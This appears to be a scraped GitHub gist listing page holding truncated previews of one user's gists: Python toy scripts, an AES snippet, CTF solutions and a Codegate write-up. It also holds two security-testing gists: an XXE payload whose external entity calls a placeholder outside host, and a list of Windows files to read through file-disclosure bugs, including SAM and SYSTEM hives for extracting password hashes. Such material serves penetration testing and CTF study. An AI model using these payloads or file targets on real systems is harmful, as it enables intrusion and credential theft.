
View Evolution of a Python programmer.py
#Newbie programmer
def factorial(x):
    """Return x! computed by plain recursion.

    The only base case is ``x == 0`` (which yields 1); every other value
    recurses on ``x - 1``. A negative or non-integer ``x`` therefore never
    reaches the base case and ends in the interpreter's recursion limit.
    """
    # Single expression: base case first, recursive step otherwise.
    return 1 if x == 0 else x * factorial(x - 1)
print factorial(6)  # Python 2 print statement (a SyntaxError on Python 3); prints 720
#First year programmer, studied Pascal
View dungeon.py
import random
def get_map(num1,num2):
result = []
idx = 0
try:
for x in range(num1):
for y in range(num2):
result.insert(idx,(x,y))
View ecb.py
from Crypto.Cipher import AES
import sys
import os
# Initialization vector length in bytes; same value as the AES block size.
# NOTE(review): the file is named ecb.py, and ECB mode takes no IV. Confirm which
# cipher mode the code after this excerpt uses. ECB maps equal plaintext blocks to
# equal ciphertext blocks, so it should not be used to protect real data.
IV_SIZE = 16
# AES block size in bytes (AES always operates on 16-byte blocks).
BLOCK_SIZE = 16
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
abdilahrf / windows_blind
Created Jan 12, 2017 — forked from waywardsun/windows_blind
Windows Blind Files
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system
View custom-dns-server.py
import socket
import time
from twisted.internet.protocol import Factory, Protocol
from twisted.internet import reactor
from twisted.names import dns
from twisted.names import client, server
from twisted.internet import defer
class MyResolver(client.Resolver):
def lookupAllRecords(self, name, timeout=None):
View fastweb.py
import requests
from bs4 import BeautifulSoup
url = "https://felicity.iiit.ac.in/contest/extra/fastandfurious/"
soup = BeautifulSoup(requests.get(url).text,"lxml")
headers = {
'user-agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36",
'content-type': "application/x-www-form-urlencoded",
'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
abdilahrf / rfile_solution.py
Created May 23, 2017 — forked from rkmylo/rfile_solution.py
RCTF 2017 - rFile Solution
from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta
# URL template for the challenge's download API. The two "{}" slots are positional
# fields, presumably filled with str.format further down; what they carry is not
# visible in this excerpt. Note the endpoint is plain HTTP.
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}'
def totimestamp(dt, epoch=datetime(1970,1,1)):
    """Return the time elapsed from *epoch* to *dt*, in seconds, as a float.

    The default *epoch* is a naive ``datetime``, so *dt* must be naive as
    well; no timezone conversion happens here. The final ``/`` is meant as
    true division, which the file enables via ``from __future__ import
    division``.
    """
    elapsed = dt - epoch
    # Work in integer microseconds first so only the final division is float.
    whole_seconds = elapsed.days * 86400 + elapsed.seconds
    total_microseconds = whole_seconds * 10**6 + elapsed.microseconds
    return total_microseconds / 10**6
abdilahrf / rcdn_solution.py
Created May 23, 2017 — forked from rkmylo/rcdn_solution.py
RCTF 2017 - rCDN Solution
# coding: utf-8
"""
Unfortunately solved 20 minutes after the end of the CTF :(
"""
import re
import sys
import string
import requests
abdilahrf / gist:65bb60222cae8c2158004dbde27857ae
Created Jun 1, 2017
Codegate 2014 CTF, web "120" write-up

Task

You are given a URI (everything happens under the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/ route) that leads to index.php, and a second one ending in index.phps that is allegedly the source code of the former. Finally, index.php contains a link to auth.php.

index.phps listing below

<?php
session_start();

$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);